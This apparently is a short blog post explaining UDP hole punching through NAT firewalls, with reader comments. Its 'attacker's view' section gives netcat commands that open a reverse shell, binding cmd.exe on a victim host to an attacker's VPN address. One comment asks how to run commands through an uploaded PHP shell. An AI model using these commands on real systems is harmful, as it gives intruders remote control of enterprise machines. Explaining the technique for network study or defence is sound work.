Why it is useful?
Imagine two hosts: Alice and Bob that both located behind NAT. And they want to exchange some data... In TCP scheme you can't accomplish that without port forwarding, but with UDP...
This technique called UDP hole punching:
1. Alice sends packet to Bob's public IP, lets say 188.8.131.52, any statefull packet inspection (SPI) firewall will start session from Alice local host to 184.108.40.206:1234.
2. Bob's firewall will drop that packet.
3. Bob sends another packet to Alice's public IP, lets say 220.127.116.11:1234, and again Bob's SPI firewall will start session.
4. Woala! Alice got UDP packet from bob.
From now, both Alive and Bob have opened sessions and may communicate each other without interference.
How it may look from an attacker's view?
Easy. Hacker that stay behind of some kind VPN may get reverse shell on your local host in enterprise network.
On attacker host:
nc -up vpn_port attackerVPNpublicIP victim_source_port
On victim host:
nc -up victim_source_port attackerVPNpublicIP vpn_port -e c:\windows\system32\cmd.exe
Proof of Concept:
Any bittorrent client :)
Wow great oneReplyDelete
But why it doesnt work for tcp ?ReplyDelete
How do you connect if just can upload a php shell to server, but you don't exec commands, just ftp